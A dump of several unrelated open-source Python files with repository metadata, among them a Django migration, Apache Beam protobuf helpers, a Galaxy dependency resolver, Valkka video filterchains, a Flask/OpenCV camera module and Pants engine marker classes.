79464b4a04c6e7f064c5353fea799b240a5f7646 | 936 | py | Python | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 13 | 2015-11-29T12:19:12.000Z | 2021-02-21T15:42:11.000Z | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 23 | 2015-04-29T19:43:34.000Z | 2021-02-10T05:50:17.000Z | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 11 | 2015-09-20T18:59:00.000Z | 2020-02-07T08:47:34.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2017-11-09 17:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0029_auto_20170827_1818'),
('programme', '0056_auto_20171104_1806'),
]
operations = [
migrations.AddField(
model_name='room',
name='event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='core.Event'),
),
migrations.AlterField(
model_name='programme',
name='room',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='programme.Room', verbose_name='Room'),
),
migrations.AlterUniqueTogether(
name='room',
unique_together=set([('event', 'slug')]),
),
]
| 31.2 | 146 | 0.605769 |
79464b74ba04907821d550c95a426dbaf84dcabb | 73 | py | Python | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | __version__ = "1.1.2"
import warnings
warnings.simplefilter("default")
| 12.166667 | 32 | 0.753425 |
79464c19c7e29dfa36f005a448d64b0b01e3b977 | 93 | py | Python | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | vetorlist= [2,3,5,7,11]
i=0
while i < len(vetorlist):
print(vetorlist[i])
i=i+1
| 15.5 | 26 | 0.569892 |
79464c2a7797ad532a10220b785aa126d7dc7296 | 2,523 | py | Python | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""For internal use only; no backwards-compatibility guarantees."""
from __future__ import absolute_import
from __future__ import division
from google.protobuf import any_pb2
from google.protobuf import struct_pb2
from google.protobuf import timestamp_pb2
def pack_Any(msg):
"""Creates a protobuf Any with msg as its content.
Returns None if msg is None.
"""
if msg is None:
return None
result = any_pb2.Any()
result.Pack(msg)
return result
def unpack_Any(any_msg, msg_class):
"""Unpacks any_msg into msg_class.
Returns None if msg_class is None.
"""
if msg_class is None:
return None
msg = msg_class()
any_msg.Unpack(msg)
return msg
def parse_Bytes(serialized_bytes, msg_class):
"""Parses the String of bytes into msg_class.
Returns the input bytes if msg_class is None."""
if msg_class is None or msg_class is bytes:
return serialized_bytes
msg = msg_class()
msg.ParseFromString(serialized_bytes)
return msg
def pack_Struct(**kwargs):
"""Returns a struct containing the values indicated by kwargs.
"""
msg = struct_pb2.Struct()
for key, value in kwargs.items():
msg[key] = value # pylint: disable=unsubscriptable-object, unsupported-assignment-operation
return msg
def from_micros(cls, micros):
result = cls()
result.FromMicroseconds(micros)
return result
def to_Timestamp(time):
"""Convert a float returned by time.time() to a Timestamp.
"""
seconds = int(time)
nanos = int((time - seconds) * 10**9)
return timestamp_pb2.Timestamp(seconds=seconds, nanos=nanos)
def from_Timestamp(timestamp):
"""Convert a Timestamp to a float expressed as seconds since the epoch.
"""
return timestamp.seconds + float(timestamp.nanos) / 10**9
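if __name__ == "__main__":
  # Small round-trip sketch of the time helpers above (not part of the original
  # module); it only assumes the protobuf runtime this file already depends on.
  import time as _time

  _now = _time.time()
  _ts = to_Timestamp(_now)
  # The conversion keeps sub-microsecond precision, so the round trip matches.
  assert abs(from_Timestamp(_ts) - _now) < 1e-5
  print(_ts, from_Timestamp(_ts))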
| 27.725275 | 96 | 0.743559 |
79464e23a46727bddcf8fd4e60f1a941da7ea274 | 5,326 | py | Python | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | """
This dependency resolver resolves tool shed dependencies (those defined
tool_dependencies.xml) installed using Platform Homebrew and converted
via shed2tap (e.g. https://github.com/jmchilton/homebrew-toolshed).
"""
import logging
import os
from xml.etree import ElementTree as ET
from .resolver_mixins import (
UsesHomebrewMixin,
UsesInstalledRepositoriesMixin,
UsesToolDependencyDirMixin,
)
from ..resolvers import DependencyResolver, NullDependency
log = logging.getLogger(__name__)
class HomebrewToolShedDependencyResolver(
DependencyResolver,
UsesHomebrewMixin,
UsesToolDependencyDirMixin,
UsesInstalledRepositoriesMixin,
):
resolver_type = "tool_shed_tap"
def __init__(self, dependency_manager, **kwds):
self._init_homebrew(**kwds)
self._init_base_path(dependency_manager, **kwds)
def resolve(self, name, version, type, **kwds):
if type != "package":
return NullDependency(version=version, name=name)
if version is None:
return NullDependency(version=version, name=name)
return self._find_tool_dependencies(name, version, type, **kwds)
def _find_tool_dependencies(self, name, version, type, **kwds):
installed_tool_dependency = self._get_installed_dependency(name, type, version=version, **kwds)
if installed_tool_dependency:
return self._resolve_from_installed_tool_dependency(name, version, installed_tool_dependency)
if "tool_dir" in kwds:
tool_directory = os.path.abspath(kwds["tool_dir"])
            tool_dependencies_path = os.path.join(tool_directory, "tool_dependencies.xml")
            if os.path.exists(tool_dependencies_path):
                return self._resolve_from_tool_dependencies_path(name, version, tool_dependencies_path)
return NullDependency(version=version, name=name)
def _resolve_from_installed_tool_dependency(self, name, version, installed_tool_dependency):
tool_shed_repository = installed_tool_dependency.tool_shed_repository
recipe_name = build_recipe_name(
package_name=name,
package_version=version,
repository_owner=tool_shed_repository.owner,
repository_name=tool_shed_repository.name,
)
return self._find_dep_default(recipe_name, None)
def _resolve_from_tool_dependencies_path(self, name, version, tool_dependencies_path):
try:
raw_dependencies = RawDependencies(tool_dependencies_path)
except Exception:
log.debug("Failed to parse dependencies in file %s" % tool_dependencies_path)
return NullDependency(version=version, name=name)
raw_dependency = raw_dependencies.find(name, version)
if not raw_dependency:
return NullDependency(version=version, name=name)
recipe_name = build_recipe_name(
package_name=name,
package_version=version,
repository_owner=raw_dependency.repository_owner,
repository_name=raw_dependency.repository_name
)
dep = self._find_dep_default(recipe_name, None)
return dep
class RawDependencies(object):
def __init__(self, dependencies_file):
self.root = ET.parse(dependencies_file).getroot()
dependencies = []
package_els = self.root.findall("package") or []
for package_el in package_els:
repository_el = package_el.find("repository")
if repository_el is None:
continue
dependency = RawDependency(self, package_el, repository_el)
dependencies.append(dependency)
self.dependencies = dependencies
def find(self, package_name, package_version):
target_dependency = None
for dependency in self.dependencies:
if dependency.package_name == package_name and dependency.package_version == package_version:
target_dependency = dependency
break
return target_dependency
class RawDependency(object):
def __init__(self, dependencies, package_el, repository_el):
self.dependencies = dependencies
self.package_el = package_el
self.repository_el = repository_el
def __repr__(self):
temp = "Dependency[package_name=%s,version=%s,dependent_package=%s]"
return temp % (
self.package_el.attrib["name"],
self.package_el.attrib["version"],
self.repository_el.attrib["name"]
)
@property
def repository_owner(self):
return self.repository_el.attrib["owner"]
@property
def repository_name(self):
return self.repository_el.attrib["name"]
@property
def package_name(self):
return self.package_el.attrib["name"]
@property
def package_version(self):
return self.package_el.attrib["version"]
def build_recipe_name(package_name, package_version, repository_owner, repository_name):
# TODO: Consider baking package_name and package_version into name? (would be more "correct")
owner = repository_owner.replace("-", "")
name = repository_name
name = name.replace("_", "").replace("-", "")
base = "%s_%s" % (owner, name)
return base
__all__ = ['HomebrewToolShedDependencyResolver']
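# Illustration of the naming scheme above, with hypothetical repository values:
# build_recipe_name("samtools", "1.9", "iuc", "package_samtools_1_9") returns
# "iuc_packagesamtools19" -- the owner loses dashes, the repository name loses
# dashes and underscores, and the two are joined with an underscore.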
| 35.271523 | 105 | 0.693203 |
79464e6956844697460966d6c2077ccd409fdcd4 | 13,854 | py | Python | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 12 | 2018-06-28T13:40:53.000Z | 2022-01-07T12:46:15.000Z | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 6 | 2019-04-29T16:55:38.000Z | 2022-03-04T17:00:15.000Z | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 5 | 2019-04-21T15:42:55.000Z | 2021-08-16T10:53:30.000Z | """
valkkafs.py : Framefilter chains for simultaneous decoding, presenting and reading / writing frames to ValkkaFS
* Copyright 2017-2020 Valkka Security Ltd. and Sampsa Riikonen
*
* Authors: Sampsa Riikonen <[email protected]>
*
* This file is part of the Valkka library.
*
* Valkka is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>
*
*/
@file valkkafs.py
@author Sampsa Riikonen
@date 2017
@version 1.2.2
@brief Framefilter chains for simultaneous decoding, presenting and reading / writing frames to ValkkaFS
"""
import sys
import time
import random
# so, everything that has .core, refers to the api1 level (i.e. swig
# wrapped cpp code)
from valkka import core
# api2 versions of the thread classes
from valkka.api2.threads import LiveThread
from valkka.api2.tools import parameterInitCheck, typeCheck
from valkka.api2.valkkafs import ValkkaFSManager
pre_mod = __name__
class ValkkaFSLiveFilterchain:
"""This class implements the following filterchain:
ValkkaFSLiveFilterchain:
::
+---> (AVThread:avthread) -------> {ForkFrameFilterN:fork_yuv} -------+
| |
(LiveThread:livethread) --> {ForkFrameFilterN:fork} --------+ request forked H264 stream +--->> OpenGLThread (connected by user)
| |
ValkkaFSWriterThread <<----+ + request forked YUV
ValkkaFSFileFilterchain:
::
ValkkaFSReaderThread -->> FileCacherThread ------------->> {ForkFrameFilterN:fork} ------+
|
{ForkFrameFilterN:fork_yuv} <-- (AVThread:avthread) <<-------+
| |
| + request forked H264 stream
+--->>> OpenGLThread (connected by user)
|
+ request forked YUV
ValkkaFSManager:
- ValkkaFSWriterThread
- ValkkaFSReaderThread
- FileCacherThread
"""
parameter_defs = {
"livethread": LiveThread,
"valkkafsmanager": ValkkaFSManager,
"address": str,
"slot": int,
"id_rec": int,
# these are for the AVThread instance:
"n_basic": (int, 20), # number of payload frames in the stack
"n_setup": (int, 20), # number of setup frames in the stack
"n_signal": (int, 20), # number of signal frames in the stack
"affinity": (int, -1),
"verbose": (bool, False),
"msreconnect": (int, 0),
# Timestamp correction type: TimeCorrectionType_none,
# TimeCorrectionType_dummy, or TimeCorrectionType_smart (default)
"time_correction": None,
# Operating system socket ringbuffer size in bytes # 0 means default
"recv_buffer_size": (int, 0),
# Reordering buffer time for Live555 packets in MILLIseconds # 0 means
# default
"reordering_mstime": (int, 0)
}
def __init__(self, **kwargs):
# auxiliary string for debugging output
self.pre = self.__class__.__name__ + " : "
# check for input parameters, attach them to this instance as
# attributes
parameterInitCheck(self.parameter_defs, kwargs, self)
self.init()
def init(self):
self.idst = str(id(self))
self.makeChain()
self.startThreads()
self.active = True
def __del__(self):
self.close()
def close(self):
if (self.active):
if (self.verbose):
print(self.pre, "Closing threads and contexes")
self.decodingOff()
self.closeLiveContext()
self.stopThreads()
self.active = False
def makeChain(self):
"""Create the filterchains
"""
self.fork = core.ForkFrameFilterN("fork_" + str(self.slot))
self.fork_yuv = core.ForkFrameFilterN("fork_yuv_" + str(self.slot))
self.framefifo_ctx = core.FrameFifoContext()
self.framefifo_ctx.n_basic = self.n_basic
self.framefifo_ctx.n_setup = self.n_setup
self.framefifo_ctx.n_signal = self.n_signal
self.framefifo_ctx.flush_when_full = True
self.avthread = core.AVThread(
"avthread_" + self.idst,
self.fork_yuv, # writes to self.fork_yuv
self.framefifo_ctx)
self.avthread.setAffinity(self.affinity)
# initial connections : live stream
self.createLiveContext() # LiveThread writes to self.fork
self.connect_to_stream("live_decode_"+str(self.slot), self.avthread.getFrameFilter()) # self.fork to AVThread
self.connect_to_stream("recorder_"+str(self.slot), self.valkkafsmanager.getInputFrameFilter()) # self.fork to ValkkaFSWriterThread
self.valkkafsmanager.setInput(self.id_rec, self.slot)
def connect_to_stream(self, name, framefilter):
return self.fork.connect(name, framefilter)
def connect_to_yuv(self, name, framefilter):
return self.fork_yuv.connect(name, framefilter)
def disconnect_from_stream(self, name):
return self.fork.disconnect(name)
def disconnect_from_yuv(self, name):
return self.fork_yuv.disconnect(name)
def createLiveContext(self):
"""Creates a LiveConnectionContext and registers it to LiveThread
"""
self.ctx = core.LiveConnectionContext()
self.ctx.slot = self.slot
if (self.address.find("rtsp://") == 0):
self.ctx.connection_type = core.LiveConnectionType_rtsp
else:
self.ctx.connection_type = core.LiveConnectionType_sdp
self.ctx.address = self.address
self.ctx.framefilter = self.fork # writes to self.fork
self.ctx.msreconnect = self.msreconnect
# some extra parameters
"""
ctx.time_correction =TimeCorrectionType::none;
ctx.time_correction =TimeCorrectionType::dummy;
default time correction is smart
ctx.recv_buffer_size=1024*1024*2; // Operating system ringbuffer size for incoming socket
ctx.reordering_time =100000; // Live555 packet reordering treshold time (microsecs)
"""
if (self.time_correction is not None):
self.ctx.time_correction = self.time_correction
self.ctx.recv_buffer_size = self.recv_buffer_size
self.ctx.reordering_time = self.reordering_mstime * 1000 # from millisecs to microsecs
# send the information about the stream to LiveThread
self.livethread.registerStream(self.ctx)
self.livethread.playStream(self.ctx)
def closeLiveContext(self):
self.livethread.stopStream(self.ctx)
self.livethread.deregisterStream(self.ctx)
def startThreads(self):
"""Starts thread required by the filter chain
"""
self.avthread.startCall()
def stopThreads(self):
"""Stops threads in the filter chain
"""
self.avthread.stopCall()
def decodingOff(self):
self.avthread.decodingOffCall()
def decodingOn(self):
self.avthread.decodingOnCall()
class ValkkaFSFileFilterchain:
"""This class implements the following filterchain:
ValkkaFSLiveFilterchain:
::
+---> (AVThread:avthread) -------> {ForkFrameFilterN:fork_yuv} -------+
| |
(LiveThread:livethread) --> {ForkFrameFilterN:fork} --------+ request forked H264 stream +--->> OpenGLThread (connected by user)
| |
ValkkaFSWriterThread <<----+ + request forked YUV
ValkkaFSFileFilterchain:
::
ValkkaFSReaderThread -->> FileCacherThread ------------->> {ForkFrameFilterN:fork} ------+
|
{ForkFrameFilterN:fork_yuv} <-- (AVThread:avthread) <<-------+
| |
| + request forked H264 stream
+--->>> OpenGLThread (connected by user)
|
+ request forked YUV
ValkkaFSManager:
- ValkkaFSWriterThread
- ValkkaFSReaderThread
- FileCacherThread
"""
parameter_defs = {
"valkkafsmanager": ValkkaFSManager,
"slot": int,
"id_rec": int,
# these are for the AVThread instance:
"n_basic": (int, 20), # number of payload frames in the stack
"n_setup": (int, 20), # number of setup frames in the stack
"n_signal": (int, 20), # number of signal frames in the stack
"affinity": (int, -1),
"verbose": (bool, False),
"msreconnect": (int, 0)
}
def __init__(self, **kwargs):
# auxiliary string for debugging output
self.pre = self.__class__.__name__ + " : "
# check for input parameters, attach them to this instance as
# attributes
parameterInitCheck(self.parameter_defs, kwargs, self)
self.init()
def init(self):
self.idst = str(id(self))
self.makeChain()
self.startThreads()
self.active = True
def __del__(self):
self.close()
def close(self):
if (self.active):
if (self.verbose):
print(self.pre, "Closing threads and contexes")
self.decodingOff()
self.valkkafsmanager.clearOutput(self.ctx)
self.stopThreads()
self.active = False
def makeChain(self):
"""Create the filterchains
"""
self.fork = core.ForkFrameFilterN("fork_" + str(self.slot))
self.fork_yuv = core.ForkFrameFilterN("fork_yuv_" + str(self.slot))
self.framefifo_ctx = core.FrameFifoContext()
self.framefifo_ctx.n_basic = self.n_basic
self.framefifo_ctx.n_setup = self.n_setup
self.framefifo_ctx.n_signal = self.n_signal
self.framefifo_ctx.flush_when_full = True
self.avthread = core.AVThread(
"avthread_" + self.idst,
self.fork_yuv, # writes to self.fork_yuv
self.framefifo_ctx)
self.avthread.setAffinity(self.affinity)
self.info = core.InfoFrameFilter("debug")
# initial connections : recorded stream
self.connect_to_stream("rec_decode_"+str(self.slot), self.avthread.getBlockingFrameFilter()) # self.fork to AVThread
# self.connect_to_stream("rec_decode_"+str(self.slot), self.info) # debug
# # self.valkkafs.setOutput(_id, slot, framefilter)
self.ctx = self.valkkafsmanager.setOutput(self.id_rec, self.slot, self.fork) # recorded stream to self.fork
# self.connect_to_yuv("debug", self.info) # debug
def connect_to_stream(self, name, framefilter):
return self.fork.connect(name, framefilter)
def connect_to_yuv(self, name, framefilter):
return self.fork_yuv.connect(name, framefilter)
def disconnect_from_stream(self, name):
return self.fork.disconnect(name)
def disconnect_from_yuv(self, name):
return self.fork_yuv.disconnect(name)
def startThreads(self):
"""Starts thread required by the filter chain
"""
self.avthread.startCall()
def stopThreads(self):
"""Stops threads in the filter chain
"""
self.avthread.stopCall()
def decodingOff(self):
self.avthread.decodingOffCall()
def decodingOn(self):
self.avthread.decodingOnCall()
def main():
pre = pre_mod + "main :"
print(pre, "main: arguments: ", sys.argv)
if (len(sys.argv) < 2):
print(pre, "main: needs test number")
else:
st = "test" + str(sys.argv[1]) + "()"
exec(st)
if (__name__ == "__main__"):
main()
| 36.55409 | 175 | 0.548939 |
79464e7a260c7fa76dd9eb8bfbc93f46605a5ab6 | 2,429 | py | Python | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | import cv2
from classfiles.yolo_hand import YOLO
from opencv_convex_hull import cv_process
class VideoCamera(object):
def __init__(self):
# Using OpenCV to capture from device 0. If you have trouble capturing
# from a webcam, comment the line below out and use a video file
# instead.
self.video = cv2.VideoCapture(0)
        # If you decide to use video.mp4, you must have that file in the same
        # folder as main.py.
# self.video = cv2.VideoCapture('video.mp4')
self.yolo = YOLO("models/cross-hands-tiny.cfg", "models/cross-hands-tiny.weights", ["hand"])
def __del__(self):
self.video.release()
def get_frame(self):
success, image = self.video.read()
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
# video stream.
ret, jpeg = cv2.imencode('.jpg', image)
return jpeg.tobytes()
def get_boxed_frame(self):
rval, frame = self.video.read()
width, height, inference_time, results = self.yolo.inference(frame)
for detection in results:
id, name, confidence, x, y, w, h = detection
cx = x + (w / 2)
cy = y + (h / 2)
# draw a bounding box rectangle and label on the image
color = (0, 255, 255)
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
text = "%s (%s)" % (name, round(confidence, 2))
cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tobytes()
def get_thresh_frame(self, rect):
rval, frame = self.video.read()
crop_img = frame[rect[0][0]:rect[1][0], rect[0][1]:rect[1][1]]
grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
# applying gaussian blur
value = (35, 35)
blurred = cv2.GaussianBlur(grey, value, 0)
        # thresholding: Otsu's binarization method
_, thresh1 = cv2.threshold(blurred, 127, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
ret, jpeg = cv2.imencode('.jpg', thresh1)
return jpeg.tobytes()
def get_game_frame(self, rect):
rval, frame = self.video.read()
img = cv_process(frame, rect)
ret, jpeg = cv2.imencode('.jpg', img)
return jpeg.tobytes()
| 38.555556 | 100 | 0.599424 |
79464ede837992597060035ea9f6ffb3de562dd3 | 1,469 | py | Python | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 127 | 2017-10-12T00:27:45.000Z | 2020-08-07T11:13:55.000Z | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 247 | 2017-12-26T12:55:34.000Z | 2020-08-08T11:57:35.000Z | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 63 | 2017-10-13T06:46:05.000Z | 2020-08-08T00:41:57.000Z | import uuid
from django.contrib.auth.models import User
from utils.enums import ObjectChangeAction
from utils.models import ObjectChange, Tag
from utils.testing import ViewTestCases
class ObjectChangeTestCase(ViewTestCases.ReadOnlyObjectViewTestCase):
model = ObjectChange
test_changelog_object = None
test_create_object = None
test_edit_object = None
test_delete_object = None
test_bulk_edit_objects = None
test_bulk_delete_objects = None
@classmethod
def setUpTestData(cls):
tag = Tag(name="Tag 1", slug="tag-1")
tag.save()
user = User.objects.create_user(username="testuser2")
for i in range(1, 4):
uid = uuid.uuid4()
change = tag.to_objectchange(ObjectChangeAction.UPDATE)
change.user = user
change.request_id = uid
change.save()
class TagTestCase(ViewTestCases.OrganizationalObjectViewTestCase):
model = Tag
test_changelog_object = None
@classmethod
def setUpTestData(cls):
Tag.objects.bulk_create(
(
Tag(name="Tag 1", slug="tag-1"),
Tag(name="Tag 2", slug="tag-2"),
Tag(name="Tag 3", slug="tag-3"),
)
)
cls.form_data = {
"name": "Tag 4",
"slug": "tag-4",
"color": "c0c0c0",
"comments": "Some comments",
}
cls.bulk_edit_data = {"color": "00ff00"}
| 25.77193 | 69 | 0.603812 |
79464efeae8c8fa3200d4558949587bd6ad306fc | 2,167 | py | Python | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | import os
# import pandas as pd
from sqlalchemy import types
# from ps_parser import PandasSqlParser
from .cursor import MongoDBDialectCursor
from .log import logger
class MongoDBDialectConnection(object):
    # TODO: this hardcoded directory should be modified
FILE_DIR = '/vagrant'
def __init__(self, username=None, password=None, host=None, database=None, **kwargs):
print("MonogoDBDialectConnection#__init__")
self.host = host
self.database = database
self.username = username
self.password = password
# self.xl = pd.ExcelFile(os.path.join(self.FILE_DIR, database) + '.xlsx')
self.limit = kwargs['limit'] if 'limit' in kwargs else 100000
def close(self):
logger.debug('Connection closed.')
self.xl.close()
def commit(self):
logger.debug('Commit.')
# self.xl.close()
def rollback(self):
logger.debug('Rollback.')
def list_tables(self):
return self.xl.sheet_names
def list_columns(self, table_name):
tb = self.xl.parse(table_name)
return [{'name': str(c), 'type': types.String, 'nullable': False, 'default': None} for c in tb.columns]
def table_path(self, table_name):
return os.path.join(self.FILE_DIR, self.database, ':', table_name)
def load_table(self, table_name):
return self.xl.parse(table_name)
def load_all_table(self, table_names):
context = {}
for tb_name in table_names:
context[tb_name] = self.load_table(tb_name)
return context
def query(self, sql):
print("query")
# psp = PandasSqlParser(sql)
table_names = []
for db_name, tb_name in psp.source_tables(True):
table_names.append(tb_name)
context = self.load_all_table(table_names)
# result_df = psp.execute(context)
# return result_df, context
def cursor(self):
print("request cursor")
return MongoDBDialectCursor(self)
def connect(username=None, password=None, host=None, database=None, **kwargs):
print("connect")
return MongoDBDialectConnection(username, password, host, database, **kwargs) | 30.521127 | 111 | 0.651131 |
79464f12f31e0da32d4475d26a399c436465c27f | 92 | py | Python | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | null | null | null | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | 4 | 2021-10-06T18:32:37.000Z | 2022-02-27T06:23:56.000Z | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | null | null | null | import subprocess
subprocess.run("rasa run actions --auto-reload", shell=True, check=True)
| 23 | 72 | 0.771739 |
7946505dded0b5a47aea545d71c5f54731ad31b8 | 2,600 | py | Python | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 1 | 2021-02-22T18:11:26.000Z | 2021-02-22T18:11:26.000Z | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 13 | 2022-02-18T22:52:57.000Z | 2022-03-30T10:11:29.000Z | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 2 | 2021-05-11T07:51:26.000Z | 2021-05-19T10:14:46.000Z | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from abc import ABC
from typing import Any, Optional
from pants.engine.fs import FileDigest, Snapshot
from pants.util.logging import LogLevel
class EngineAwareParameter(ABC):
"""A marker class for rule parameters that allows sending additional metadata to the engine.
When Pants executes a rule, the engine will call this marker class's methods on the rule's
inputs to see if they implement any of the methods. If the method returns `None`, the engine
will do nothing; otherwise, it will use the additional metadata provided.
"""
def debug_hint(self) -> Optional[str]:
"""If implemented, this string will be shown in `@rule` debug contexts if that rule takes
the annotated type as a parameter."""
return None
class EngineAwareReturnType(ABC):
"""A marker class for types that are returned by rules to allow sending additional metadata to
the engine.
When Pants finishes executing a rule, the engine will call this marker class's methods to see if
it implements any of the methods. If the method returns `None`, the engine will do nothing;
otherwise, it will use the additional metadata provided.
"""
def level(self) -> LogLevel | None:
"""If implemented, this method will modify the level of the workunit associated with any
`@rule`s that return the annotated type.
For instance, this can be used to change a workunit that would normally be at `Debug` level
to `Warn` if an anomalous condition occurs within the `@rule`.
"""
return None
def message(self) -> str | None:
"""If implemented, this adds a result message to the workunit for any `@rule`'s that return
the annotated type.
The final message will take the form "Completed: <Rule description> - <this method's return
value>". This method may use newlines.
"""
return None
def artifacts(self) -> dict[str, FileDigest | Snapshot] | None:
"""If implemented, this sets the `artifacts` entry for the workunit of any `@rule`'s that
return the annotated type.
`artifacts` is a mapping of arbitrary string keys to `Snapshot`s or `FileDigest`s.
"""
return None
def metadata(self) -> dict[str, Any] | None:
"""If implemented, adds arbitrary key-value pairs to the `metadata` entry of the `@rule`
workunit."""
return None
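
# --- Editorial example (not part of the original Pants source). A minimal sketch of
# how a plugin might implement these marker classes; the lint request/result names
# below are made up for illustration, and the exact workunit output depends on the
# Pants version in use.
from dataclasses import dataclass


@dataclass(frozen=True)
class _ExampleLintRequest(EngineAwareParameter):
    path: str

    def debug_hint(self) -> Optional[str]:
        # Shown in `@rule` debug contexts, e.g. the path of the file being linted.
        return self.path


class _ExampleLintResult(EngineAwareReturnType):
    def __init__(self, exit_code: int) -> None:
        self.exit_code = exit_code

    def level(self) -> LogLevel | None:
        # Escalate the workunit level when the underlying tool failed.
        return LogLevel.WARN if self.exit_code != 0 else LogLevel.DEBUG

    def message(self) -> str | None:
        return f"lint exited with code {self.exit_code}"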
| 38.80597 | 100 | 0.689615 |
7946506148a0502c84b47c13173e1863b700995b | 48 | py | Python | ipyvuetify/extra/__init__.py | Carifio24/ipyvuetify | 59a9922ed93d1d5e61593243985566bc473caa98 | [
"MIT"
